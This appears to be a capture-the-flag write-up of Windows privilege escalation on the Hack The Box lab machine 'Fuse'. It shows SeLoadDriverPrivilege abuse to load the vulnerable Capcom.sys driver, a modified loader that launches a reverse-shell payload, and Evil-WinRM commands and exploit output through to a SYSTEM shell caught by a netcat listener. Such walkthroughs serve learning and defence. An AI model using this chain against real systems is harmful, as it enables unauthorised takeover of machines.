InfoSec LAB

Fuse_Privilege_Escalation

Created: 4 min read

Vulnerable Driver Load

Since the svc-print user has SeLoadDriverPrivilege enabled, I can take advantage of that by loading a vulnerable or malicious driver to the target system to escalate privileges

In order to conduct this operation, the following 3 items are required

  • A Driver Loader
  • A Vulnerable Driver
  • An Exploit

driver loader (eoploaddriver)

I will be using the EoPLoadDriver made by TarlogicSecurity

Vulnerable Driver (Capcom)

I will be using a very old and vulnerable driver, Capcom.sys, mostly used for gaming i grabbed the copy of it in an exploit repo.

exploit

There’s been multiple trials and errors before landing on to this particular exploit This one works well.

Compile

unlike the [[#vulnerable driver (capcom)|driver]] itself, both the [[#Driver Loader (EoPLoadDriver)|Driver Loader]] and [[#Exploit|Exploit]] need to be compiled prior to deployment and exploitation. I will be using Visual Studio for compilation.

I will start with the driver loader

Compiling EoPLoadDriver

I will first create a new project with the Console App option for C++

Call it EoPLoadDriver

Looking at the source code, It’s launching C:\\Windows\\System32\\cmd.exe upon successful exploitation. This would work if I had a RDP session, but I don’t, so I would need to change that.

I changed it to point to the location of the payload that will be located at C:\\tmp\SeLoadDriverPrivilege\\pe.exe This should execute the reverse shell executable instead of spawning a new process with cmd.exe

Initial build attempt failed due to a header file not being present. stdafx.h is the issue, and I don’t need that.

I will just comment it out.

Build succeeded despite of a small warning.

EoPLoadDriver.exe is all set and ready

Compiling Exploit

I did pretty much the same procedure as the driver loader and compiled the exploit. It worked right out of the box this time. No modifying or commenting out needed.

ExploitCapcom.exe is all set and ready.

Exploitation

*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> upload SeLoadDriverPrivilege/capcom/Capcom.sys C:\tmp\SeLoadDriverPrivilege\Capcom.sys
Info: Uploading SeLoadDriverPrivilege/capcom/Capcom.sys to C:\tmp\SeLoadDriverPrivilege\Capcom.sys
Data: 14100 bytes of 14100 bytes copied
 
Info: Upload successful!
 
*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> upload SeLoadDriverPrivilege/capcom/ExploitCapcom.exe C:\tmp\SeLoadDriverPrivilege\ExploitCapcom.exe
Info: Uploading SeLoadDriverPrivilege/capcom/ExploitCapcom.exe to C:\tmp\SeLoadDriverPrivilege\ExploitCapcom.exe
Data: 365224 bytes of 365224 bytes copied
 
Info: Upload successful!
 
*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> upload SeLoadDriverPrivilege/EoPLoadDriver.exe C:\tmp\SeLoadDriverPrivilege\EoPLoadDriver.exe
Info: Uploading SeLoadDriverPrivilege/EoPLoadDriver.exe to C:\tmp\SeLoadDriverPrivilege\EoPLoadDriver.exe
Data: 20480 bytes of 20480 bytes copied
 
Info: Upload successful!
 
*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> dir
 
 
    Directory: C:\tmp\SeLoadDriverPrivilege
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/2/2023   2:01 PM          10576 Capcom.sys
-a----         2/2/2023   2:02 PM          15360 EoPLoadDriver.exe
-a----         2/2/2023   2:02 PM         273920 ExploitCapcom.exe
-a----         2/2/2023   2:02 PM           8192 pe.exe

I transferred All 3 necessary items and the payload to the target system over the existing WinRM Session

*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> ./EoPLoadDriver.exe -h
Tarlogic Security
Usage: EOPLOADDRIVER.exe RegistryServicePath DriverImagePath
   eg: EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\Users\Username\Desktop\Driver.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0

I loaded the Capcom.sys driver with EoPLoadDriver and it exited with 00000000, which means a success! I can see that the vulnerable driver is load to the registry at \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService

*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> ./ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 0000025479C80008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

Launching the exploit!

┌──(kali㉿kali)-[~/…/htb/labs/fuse/SeLoadDriverPrivilege]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.193] 53104
Windows PowerShell running as user svc-print on FUSE
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\tmp\SeLoadDriverPrivilege> whoami
nt authority\system
PS C:\tmp\SeLoadDriverPrivilege> hostname
Fuse
PS C:\tmp\SeLoadDriverPrivilege> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::bb
   IPv6 Address. . . . . . . . . . . : dead:beef::786e:10c2:1173:5102
   Link-local IPv6 Address . . . . . : fe80::786e:10c2:1173:5102%5
   IPv4 Address. . . . . . . . . . . : 10.10.10.193
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
                                       10.10.10.2
 
Tunnel adapter isatap.{AF2C7A34-A136-4854-894E-84F30DA6C214}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

boom! Domain Level Compromise

Interactive Graph View

Backlinks